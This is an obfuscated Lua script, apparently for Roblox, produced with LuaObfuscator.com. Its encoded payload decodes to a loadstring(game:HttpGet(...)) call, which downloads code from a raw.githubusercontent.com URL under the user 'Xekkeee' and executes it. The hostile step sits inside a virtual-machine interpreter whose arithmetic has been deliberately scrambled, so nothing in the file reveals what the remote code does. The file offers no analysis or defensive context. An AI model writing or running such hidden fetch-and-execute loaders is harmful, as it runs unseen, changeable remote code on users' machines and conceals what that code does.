print("https://github.com/Xekkeee/Project-GUI/edit/main/4th")

--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v132=0;local v133;while true do if (v132==1) then return v133;end if (v132==0) then v133=v5(v88,v19);v19=nil;v132=1;end end else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/(((6 -1) -3)^(v32-(2 -(1066 -(68 + 997))))))%((3 -1)^(((v33-((1272 -(226 + 1044)) -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v89-(v89%(569 -((1597 -1230) + 201))) ;else local v90=927 -(214 + 713) ;local v91;while true do if (v90==(0 + 0)) then v91=(1 + 1)^(v32-(878 -(282 + (712 -(32 + 85))))) ;return (((v31%(v91 + v91))>=v91) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(957 -(892 + 65))) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 -(0 -0) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;return (v37 * (188 + 68)) + v36 ;end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==((0 -0) + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (15 -11) ;v38=953 -(802 + 150) ;end if (v38==(2 -1)) then return (v42 * ((17728772 + 12704480) -(17959633 -4303597))) + (v41 * (47703 + 17833)) + (v40 * (1253 -(915 + 82))) + v39 ;end end end local function v24() local v43=1187 -(1069 + 118) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==((5 + 1) -(1058 -(87 + 968)))) then if (v48==(0 -0)) then if (v47==(0 + 0)) then return v49 * (0 -(0 -0)) ;else v48=1 + 0 + 0 ;v46=859 -(814 + 45) ;end elseif (v48==(5043 -2996)) then return ((v47==(791 -(368 + 423))) and (v49 * ((3 -(4 -2))/(18 -(10 + 8))))) or (v49 * NaN) ;end return v8(v49,v48-(3934 -2911) ) * (v46 + (v47/((444 -(416 + (1439 -(447 + 966))))^(937 -(261 + 624))))) ;end if (v43==(6 -4)) then v48=v20(v45,10 + 11 ,54 -23 );v49=((v20(v45,1112 -(1020 + 60) )==(1424 -(630 + 793))) and  -(3 -(5 -3))) or (439 -(145 + 293)) ;v43=2 + (1818 -(1703 + 114)) ;end if (v43==(431 -(44 + 386))) then v46=1748 -(760 + 987) ;v47=(v20(v45,1487 -(998 + (1189 -(376 + 325))) ,(10 -3) + (39 -26) ) * ((1 + 1 + 0)^32)) + v44 ;v43=2 + 0 ;end if (v43==(0 -(0 -0))) then v44=v23();v45=v23();v43=773 -(201 + 571) ;end end end local function v25(v50) local v51=14 -(3 + 6 + 5) ;local v52;local v53;while true do if (v51==(378 -(85 + 291))) then v53={};for v116=1266 -(243 + 1022) , #v52 do v53[v116]=v2(v1(v3(v52,v116,v116)));end v51=3;end if (((10 -7) -2)==v51) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=2 + 0 ;end if (v51==(1180 -(1123 + 57))) then v52=nil;if  not v50 then local v122=0 + 0 ;while true do if (0==v122) then v50=v23();if (v50==(254 -(163 + 91))) then return "";end break;end end end v51=1931 -(1869 + 61) ;end if (v51==3) then return v6(v53);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0;end)();local v93=(function() return;end)();local v95=(function() return;end)();while true do if (v92==(290 -(60 + 230))) then local v123=(function() return 572 -(426 + 146) ;end)();local v124=(function() return;end)();while true do if ((0 + 0)~=v123) then else v124=(function() return 1456 -(282 + 1174) ;end)();while true do if (v124~=(811 -(569 + 242))) then else v93=(function() return v94();end)();v95=(function() return nil;end)();v124=(function() return 2 -1 ;end)();end if (v124==(1 + 0)) then v92=(function() return  #"}";end)();break;end end break;end end end if (v92~= #"]") then else if (v93== #"[") then v95=(function() return v94()~=0 ;end)();elseif (v93==2) then v95=(function() return v96();end)();elseif (v93== #"nil") then v95=(function() return v97();end)();end v98[v99]=(function() return v95;end)();break;end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v55=(function() return function(v100,v101,v102,v103,v104,v105,v106,v107,v108) local v109=(function() return 1024 -(706 + 318) ;end)();local v100=(function() return;end)();local v101=(function() return;end)();while true do if (v109==(1251 -(721 + 530))) then local v126=(function() return 1271 -(945 + 326) ;end)();while true do if (v126==1) then v109=(function() return 1;end)();break;end if (v126~=(0 -0)) then else v100=(function() return 0;end)();v101=(function() return nil;end)();v126=(function() return 1;end)();end end end if (v109~=1) then else local v127=(function() return 0 + 0 ;end)();while true do if (v127~=(700 -(271 + 429))) then else while true do if (v100~=0) then else v101=(function() return v102();end)();if (v103(v101, #" ", #"{")~=0) then else local v169=(function() return 0 + 0 ;end)();local v170=(function() return;end)();local v171=(function() return;end)();local v172=(function() return;end)();local v173=(function() return;end)();while true do if (0~=v169) then else local v180=(function() return 1500 -(1408 + 92) ;end)();local v181=(function() return;end)();while true do if (v180~=(1086 -(461 + 625))) then else v181=(function() return 0;end)();while true do if ((1288 -(993 + 295))~=v181) then else v170=(function() return 0;end)();v171=(function() return nil;end)();v181=(function() return 1 + 0 ;end)();end if (v181==(1172 -(418 + 753))) then v169=(function() return 1 + 0 ;end)();break;end end break;end end end if (v169==(1 + 0)) then local v182=(function() return 0;end)();while true do if ((1 + 0)~=v182) then else v169=(function() return 1 + 1 ;end)();break;end if (v182==0) then v172=(function() return nil;end)();v173=(function() return nil;end)();v182=(function() return 1;end)();end end end if (v169==(531 -(406 + 123))) then while true do if (v170== #"-19") then if (v103(v172, #"gha", #"xnx")~= #"/") then else v173[ #"xnxx"]=(function() return v104[v173[ #"http"]];end)();end v105[v106]=(function() return v173;end)();break;end if (v170~=(1769 -(1749 + 20))) then else local v188=(function() return 0 + 0 ;end)();local v189=(function() return;end)();while true do if (v188==(1322 -(1249 + 73))) then v189=(function() return 0;end)();while true do if (v189==(0 + 0)) then v171=(function() return v103(v101,1147 -(466 + 679) , #"nil");end)();v172=(function() return v103(v101, #"asd1",14 -8 );end)();v189=(function() return 1;end)();end if (v189==1) then v170=(function() return  #"}";end)();break;end end break;end end end if (v170~=2) then else local v190=(function() return 0;end)();local v191=(function() return;end)();while true do if (0==v190) then v191=(function() return 0 -0 ;end)();while true do if ((1900 -(106 + 1794))==v191) then if (v103(v172, #":", #"<")== #".") then v173[1 + 1 ]=(function() return v104[v173[1 + 1 ]];end)();end if (v103(v172,5 -3 ,2)== #":") then v173[ #"-19"]=(function() return v104[v173[ #"19("]];end)();end v191=(function() return 2 -1 ;end)();end if (v191~=1) then else v170=(function() return  #"gha";end)();break;end end break;end end end if (v170~= #" ") then else local v192=(function() return 114 -(4 + 110) ;end)();local v193=(function() return;end)();while true do if (v192~=(584 -(57 + 527))) then else v193=(function() return 1427 -(41 + 1386) ;end)();while true do if (v193~=(104 -(17 + 86))) then else v170=(function() return 2 + 0 ;end)();break;end if (v193~=0) then else v173=(function() return {v107(),v107(),nil,nil};end)();if (v171==0) then local v197=(function() return 0 -0 ;end)();local v198=(function() return;end)();while true do if (v197==(0 -0)) then v198=(function() return 166 -(122 + 44) ;end)();while true do if (v198~=0) then else v173[ #"nil"]=(function() return v107();end)();v173[ #".com"]=(function() return v107();end)();break;end end break;end end elseif (v171== #">") then v173[ #"asd"]=(function() return v108();end)();elseif (v171==2) then v173[ #"19("]=(function() return v108() -(2^16) ;end)();elseif (v171== #"gha") then local v203=(function() return 0;end)();while true do if (v203==0) then v173[ #"asd"]=(function() return v108() -(2^16) ;end)();v173[ #".dev"]=(function() return v107();end)();break;end end end v193=(function() return 1 -0 ;end)();end end break;end end end end break;end end end break;end end return v100,v101,v102,v103,v104,v105,v106,v107,v108;end end end end end;end)();local v56=(function() return function(v110,v111,v112) local v113=(function() return 0 -0 ;end)();while true do if ((0 + 0)~=v113) then else local v128=(function() return 0 + 0 ;end)();local v129=(function() return;end)();while true do if (v128~=(0 -0)) then else v129=(function() return 0;end)();while true do if (v129~=(65 -(30 + 35))) then else v110[v111-#"~" ]=(function() return v112();end)();return v110,v111,v112;end end break;end end end end end;end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {};end)();local v60=(function() return {v57,v58,nil,v59};end)();local v61=(function() return v23();end)();local v62=(function() return {};end)();for v70= #"{",v61 do FlatIdent_494DF,Type,v21,Cons,v24,v25,v62,v70=(function() return v54(FlatIdent_494DF,Type,v21,Cons,v24,v25,v62,v70);end)();end v60[ #"91("]=(function() return v21();end)();for v71= #"/",v23() do FlatIdent_189F0,Descriptor,v21,v20,v62,v57,v71,v22,v23=(function() return v55(FlatIdent_189F0,Descriptor,v21,v20,v62,v57,v71,v22,v23);end)();end for v72= #"~",v23() do v58,v72,v28=(function() return v56(v58,v72,v28);end)();end return v60;end local function v29(v64,v65,v66) local v67=v64[1];local v68=v64[2];local v69=v64[1260 -(444 + 599 + 214) ];return function(...) local v73=v67;local v74=v68;local v75=v69;local v76=v27;local v77=3 -2 ;local v78= -1;local v79={};local v80={...};local v81=v12("#",...) -(1213 -(323 + 889)) ;local v82={};local v83={};for v114=0 -0 ,v81 do if (v114>=v75) then v79[v114-v75 ]=v80[v114 + (581 -(361 + 219)) ];else v83[v114]=v80[v114 + (321 -(53 + 267)) ];end end local v84=(v81-v75) + (1581 -(1183 + 397)) + 0 ;local v85;local v86;while true do local v115=(1257 -844) -(15 + 398) ;while true do if ((4157>1889) and (v115==(982 -(18 + 707 + 257)))) then v85=v73[v77];v86=v85[3 -2 ];v115=1 + 0 ;end if (v115==(1 + (1975 -(1913 + 62)))) then if (v86<=(2 + 1)) then if (v86<=1) then if ((v86>(850 -(20 + 830))) or (1912>2982)) then do return;end else local v135=v85[2 + 0 ];local v136=v83[v85[129 -(74 + 42 + 10) ]];v83[v135 + 1 + 0 ]=v136;v83[v135]=v136[v85[4]];end elseif (v86==(740 -(542 + (518 -322)))) then v83[v85[1935 -(565 + 1368) ]]=v66[v85[3]];else local v142=v85[3 -(3 -2) ];v83[v142]=v83[v142](v13(v83,v142 + 1 + 0 ,v78));end elseif ((647<=3287) and (v86<=((1664 -(1477 + 184)) + 2))) then if ((v86>((2 -0) + 2)) or (2318>=4800)) then v83[v85[4 -2 ]]=v85[7 -4 ];else v83[v85[2]]();end elseif (v86<=(1557 -(1050 + 76 + 425))) then local v146;local v147,v148;local v149;local v150;v83[v85[407 -(118 + (1143 -(564 + 292))) ]]={};v77=v77 + (3 -2) ;v85=v73[v77];v83[v85[1123 -(118 + 1003) ]]=v66[v85[3]];v77=v77 + (2 -1) ;v85=v73[v77];v83[v85[379 -(142 + 235) ]]=v66[v85[13 -10 ]];v77=v77 + 1 + (0 -0) ;v85=v73[v77];v150=v85[979 -(553 + 424) ];v149=v83[v85[5 -2 ]];v83[v150 + 1 ]=v149;v83[v150]=v149[v85[4 + 0 ]];v77=v77 + (2 -1) + 0 ;v85=v73[v77];v83[v85[2 + (304 -(244 + 60)) ]]=v85[2 + 1 ];v77=v77 + 1 + 0 ;v85=v73[v77];v150=v85[4 -2 ];v147,v148=v76(v83[v150](v13(v83,v150 + ((2 + 0) -1) ,v85[6 -3 ])));v78=(v148 + v150) -(1 + 0) ;v146=0 -0 ;for v166=v150,v78 do v146=v146 + (754 -(239 + 514)) ;v83[v166]=v147[v146];end v77=v77 + 1 + 0 ;v85=v73[v77];v150=v85[1331 -(797 + 532) ];v83[v150]=v83[v150](v13(v83,v150 + 1 + 0 ,v78));v77=v77 + (477 -(41 + 435)) ;v85=v73[v77];v83[v85[1 + 1 ]]();v77=v77 + 1 ;v85=v73[v77];do return;end elseif (v86>(16 -9)) then local v174=1202 -(373 + 829) ;local v175;local v176;local v177;local v178;while true do if ((v174==(731 -(476 + 255))) or (142>=4749)) then v175=v85[1132 -(369 + 761) ];v176,v177=v76(v83[v175](v13(v83,v175 + 1 + 0 ,v85[5 -2 ])));v174=1 -0 ;end if (v174==((1240 -(938 + 63)) -(64 + 174))) then v78=(v177 + v175) -(1 + 0) ;v178=0 -0 ;v174=338 -(144 + 192) ;end if (v174==(218 -(42 + 174))) then for v184=v175,v78 do v178=v178 + 1 ;v83[v184]=v176[v178];end break;end end else v83[v85[2 + 0 ]]={};end v77=v77 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403A23Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F58652Q6B3Q652F37393079387132333738303435767162322D34313236386F3465693176622D33343531396933386F343531326D2D31323935343330766873643637386164663233353235367132353233342F726566732F68656164732F6D61696E2F3132333132333132383334743631343135313536373474313834313400094Q00067Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
